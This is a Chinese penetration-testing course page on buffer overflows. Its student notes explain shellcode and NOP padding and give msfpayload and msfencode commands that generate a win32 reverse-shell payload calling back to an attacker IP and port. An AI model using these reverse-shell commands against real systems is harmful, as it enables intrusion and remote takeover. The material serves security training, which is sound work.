默认计划
931人加入学习
(9人评价)
安全测试缓冲区溢出

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 300.00
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习

在内存中存放数据完全相反的

f7键是调试过程中单步向前执行

下一步就向esp里面写入shellcode的代码啦

写shellcode 自己运用scratch写编码

第二就是现成的 kali里面有msfpayload 就是生产各种各样的shellcode

payload 又称载荷 要发到目标系统中 有目标系统进行执行 然后取得控制权之类的代码

shell是payload的子集 

生产shellcode 然后注入到esp寄存器里面 按他让我们跳转的方式执行从而控制目标服务器

或者是自己有一个后门程序 将他16进制提取出来 发到对方esp服务器里面 当然shellcode内容也比较要小

寻找的命令格式

win32 就是在windows上执行的

win32反向链接

让受害者主动向我进行连接

连我的结果就是将我的shell操作系统的权限发给你

msfencode 可以对shellcode进行编码 吧坏字符过滤 -b表示过滤

\x对应的汇编语言是nop 是不操作的意思

因为 保证shellcode运行的有效性 直接跳转到esp 前面的第一位或者几位字符可能被cpu进行擦除掉或者是覆盖 和cpu的特性有关 

[展开全文]

find / -name msfpayload

cd /usr/share/framework2/

./msfpayload                   //用于生成payload

win32_reverse LHOST=192.168.1.117 LPORT=444 C  //生成用C语言写的反向连接444端口

win32_reverse LHOST=192.168.1.117  | grep 0d

 

win32_reverse LHOST=192.168.1.117  R | ./msfencode -b "\x00\x0a\x0d"     //-b表示不要

 

"\x90" 表示不操作    

[展开全文]

发送测试数据08.py

断点停止后,按F7

使用msfpayload生成shellcode

cd /usr/share/framework2

./msfpayload -l

注意:现在服务器防火墙通常只允许外部访问特定端口,就算运行脚本开启服务器的其他端口外部也不能访问,故shellcode一般让服务器来主动连接攻击者端口

生成shellcode

./msfpayload win32_reverse LHOST=192.168.20.8 LPORT=443 C

在shellcode发现坏字符,通过编码绕过

./msfpayload win32_reverse LHOST=192.168.20.8 LPORT=443 R | ./msfencode -b “\x00\x0a\x0d”

将shellcode编入程序

为了避免shellcode前几个字符被擦掉,在shellcode前面插入几个空字符

[展开全文]